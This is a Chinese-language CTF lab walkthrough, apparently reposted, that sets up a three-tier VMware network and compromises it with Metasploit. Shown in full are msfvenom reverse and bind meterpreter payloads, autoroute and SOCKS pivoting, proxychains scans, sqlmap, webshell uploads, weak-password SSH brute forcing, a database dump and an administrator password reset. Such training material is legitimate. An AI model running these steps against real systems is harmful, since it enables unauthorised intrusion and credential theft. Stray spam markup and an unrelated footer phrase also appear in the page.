<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    三層網絡靶場搭建&MSF內網滲透

    VSole2022-07-31 07:38:47


    在最近的CTF比賽中,綜合靶場出現的次數越來越多,這種形式的靶場和真實的內網滲透很像,很貼合實際工作,但我們往往缺少多層網絡的練習環境。本文通過VMware搭建3層網絡,并通過msf進行內網滲透,涉及代理搭建,流量轉發,端口映射等常見內網滲透技術。

    網絡拓撲

    環境搭建

    首先在虛擬機中新建3塊網卡,選擇僅主機模式

    將kali設為第一層網絡vmnet1

    將第一層靶機設為雙網卡vmnet1和vmnet2

    將第二層靶機設置為雙網卡:vmnet2和vmnet3:

    將第三層靶機設為vmnet3:

    至此,我們的3層網絡環境就已經搭建完畢。

    第一層靶機

    Nmap探測一下,發現8080端口:

    訪問一下:

    返現文件上傳點,經測試沒有任何過濾,可以直接上傳任意文件,因此直接上傳jsp一句話后門:

    上傳后返回文件路徑,菜刀連接:

    為了進一步做內網滲透,上傳msf后門:

    1、后門制作:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf

    將shell.elf上傳到第一層靶機192.168.59.129

    2、MSF設置監聽:

    3、在第一層靶機運行shell.elf

    Chmod 777 shell.elf

    ./shell.elf

    4、Msf獲得meterpreter,執行shell,查看網絡配置,發現雙網卡,第二層網絡段為192.168.80.0/24

    第二層靶機

    首先利用第一層的meterpreter添加到第二層的路由:

    run autoroute -s 192.168.80.0/24

    然后利用msf進行第二層網絡存活主機掃描:

    use auxiliary/scanner/discovery/arp_sweep

    發現第二層靶機 192.168.80.129。

    接著利用msf搭建socks代理,好讓攻擊機直接打第二層網絡:

    use auxiliary/server/socks4a

    然后在第一層網絡配置相關socks4代理客戶端:

    Proxychain:

    在配置文件/etc/proxychains.conf中添加:

    socks4 192.168.59.128 9999

    然后利用proxychans 啟動nmap對第二層靶機進行掃描,這里注意一定要加上-Pn和-sT參數:

    proxychains nmap -Pn -sT 192.168.80.129 -p1-1000

    發現第二層主機開放22和80端口。

    在Chrome中配置代理

    訪問第二層網絡:

    是一個typecho的 cms,嘗試admin/admin等弱口令登陸后臺,登陸成功:

    個人信息處發現flag:

    在設置中允許上傳php

    然后撰寫文章,附件上傳php webshell:

    可以看到 shell 路徑,用蟻劍連接,因為是第二層網絡,所以得通過socks代理客戶端去啟動蟻劍,我用的是sockscap64:

    在代理中配置代理服務器:

    用蟻劍連接shell:

    在網站根目錄處發現flag

    查看config.inc.php:

    發現數據庫口令123:

    將數據庫dump出來:

    mysqldump -uroot -p123 typecho >/tmp/1.sql

    在1.sql中發現flag:

    第二層靶機還開放了22端口,嘗試利用msf、hydra探測一下弱口令:

    Hydra:

    Msf:

    use auxiliary/scanner/ssh/ssh_login

    同樣發現弱口令,同時msf可以直接獲得一個meterpreter

    獲得flag:

    在sockscap64中打開ssh客戶端:

    也可以利用root/123456登錄,獲得flag

    同樣,為了打進第三層,我們需要在第二層靶機上上傳msf后門,

    制作后門:

    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4321 -f elf > shell1.elf

    利用蟻劍上傳,并在第二層靶機運行:

    Chmod 777 ./shell1.elf

    ./shell1.elf

    在msf上配置payload:

    獲得第二層meterpreter:

    發現第三層網段192.168.226.0/24

    然后利用這個meterpreter添加到第三層的網絡路由:

    run autoroute -s 192.168.226.0/24

    在啟用一個socks代理給第三層網絡,端口開9998

    然后在proxychains的配置文件中加上9998:

    掃描一下第三層主機端口:

    proxychains nmap -Pn -sT 192.168.226.129 -p1-1000

    發現開放了80、445端口

    第三層網絡

    在chrome 修改代理,端口改為9998

    訪問第三層網絡

    查詢處存在 SQL 注入

    抓包:

    Proxychains 跑sqlmap

    proxychains sqlmap -r test.txt

    得到后臺用戶密碼:admin/faka123

    登錄:

    發現flag。接著在logo上傳處發現任意文件上傳:

    直接上傳木馬,獲得路徑:

    菜刀連接,網站根目錄發現flag

    發現網站開啟了3389,同時是system權限:

    直接修改administrator密碼:

    net user administrator 123456

    再把第三層3389流量轉發到代理服務器中:

    訪問遠程桌面:

    發現flag:

    同時,該靶機開放445端口,試試永痕之藍:

    同樣可以拿到shell。

    至此,我們已經拿下3層網絡中的全部機器。

    本文來源:碼農網本文鏈接:https://www.codercto.com/a/62065.html

    msf網絡滲透
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    利用這個實驗我們就可以更清晰的了解多層網絡滲透測試的過程。并了解通過msf進行內網滲透,由一級代理到二級代理的搭建來進行對三層網絡滲透的過程。
    在最近的CTF比賽中,綜合靶場出現的次數越來越多,這種形式的靶場和真實的內網滲透很像,很貼合實際工作,但我們往往缺少多層網絡的練習環境。本文通過VMware搭建3層網絡,并通過msf進行內網滲透,涉及代理搭建,流量轉發,端口映射等常見內網滲透技術。
    由于是三層網絡,寫起來圖會比較多,選取了四款常用穿透軟件:ew,nps,frp,venom進行試驗。環境搭建拓撲圖如下:192.168.1.0/24模擬公網環境。每臺PC上都有一個web服務,內網主機除邊緣win7外全部不出網,內網同網段之間的主機可以相互訪問,不同網段相互隔離。
    nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的實際可運行的名字叫nc,應該早很就被提供,就象另一個沒有公開但是標準的Unix工具。
    發現內網主機:10.10.10.2、10.10.10.4在meterpreter中輸入命令 shell 進入 成員服務器Winserver 2008-2 的命令行,使用命令查看網絡詳細情況meterpreter > shell. 通過這些信息可以判斷 成員服務器Winserver 2008-2 在 ocean.com 域中,根據 DNS 信息判斷域控主機 IP 為10.10.10.2設置路由使用 Nmap 對內網主機進行掃描meterpreter > background. msf5 exploit > route add 10.10.10.3 255.255.255.0 1. # 將被控機成員服務器Winserver 2008-2的IP添加到 MSF 中,這是給kali增加的路由,添加之后kali才才能找到內網主機
    滲透中,當我們拿下一臺服務器作為跳板機進一步進行內網滲透時,往往需要通過主機存活探測和端口掃描來收集內網資產。UDP有不提供數據包分組、組裝和不能對數據包進行排序的缺點,也就是說,當報 文發送之后,是無法得知其是否安全完整到達的。
    本文要介紹的就是業內知名的一款能夠用于內網滲透時團隊協同作戰的工具“Cobalt Strike”。Cobalt Strike 是一款美國 Red Team 開發的滲透測試神器,常被業界人稱為 CS。
    常用的隧道工具
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类